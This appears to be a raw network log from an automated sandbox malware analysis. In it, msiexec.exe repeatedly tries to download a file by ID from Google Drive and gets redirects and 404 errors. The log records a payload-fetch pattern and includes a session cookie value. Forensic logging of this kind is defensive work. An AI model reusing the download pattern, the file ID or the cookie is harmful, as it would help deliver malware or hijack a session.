                                                                Content-Security-Policy: script-src 'nonce-541YQCZUsFL27x04-D9NZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:39 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 6b 39 78 39 46 42 35 50 30 79 69 7a 68 49 6f 5f 76 42 6b 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Qk9x9FB5P0yizhIo_vBkLA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.1150015142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:39 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:40 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:40 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-UURDnNt8hTvijtIup_mrpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.1150016142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:40 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:41 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgSaU1zR7x_jyOQOg7yUUp4Pe0wxX0lN8DNMZKnZZng-ypQr_orzOSh0sa-INFda2dIskYn46OQ
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:41 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-kWSbCkBuvMyrfOd-mR33MQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:41 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 55 5f 71 74 31 64 53 42 58 39 66 52 4f 77 47 6c 6f 2d 62 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gU_qt1dSBX9fROwGlo-bpg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.1150017142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:42 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:42 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:42 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-VxoCH2QyFYRzkgJpvIrWxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.1150018142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:43 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:43 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgSPu2wOKjs9eJSKa8hFxUgC8-A3QA7fTfU11WXzoLsRM0kbdRQuCAB49KG8i7NVkd2p
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:43 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-5NUCwXUAOXaI8nvxWA8FMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 33 51 49 35 50 79 49 41 45 43 6a 74 75 50 32 71 38 44 51 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="I3QI5PyIAECjtuP2q8DQdw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.1150019142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:44 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:44 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:44 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-xODaQPkf6S2F6F-0HiI_-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.1150020142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:45 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:45 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQrhTaPy6bBY-EkXWc0zz2q7MoGQhI23JGvSVuQt7T1nmJU4XDJolUZHjnbSp6AlBkrd-dfgQE
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:45 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-31KNQ2Ly-uzc3hEO2ANNvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 31 32 58 59 51 4d 52 6e 77 34 53 67 64 68 49 6d 35 68 38 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S12XYQMRnw4SgdhIm5h8yg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.1150021142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:46 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:47 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:46 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-GxRdi_4ecogMkE3NFh5m8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.1150022142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:47 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
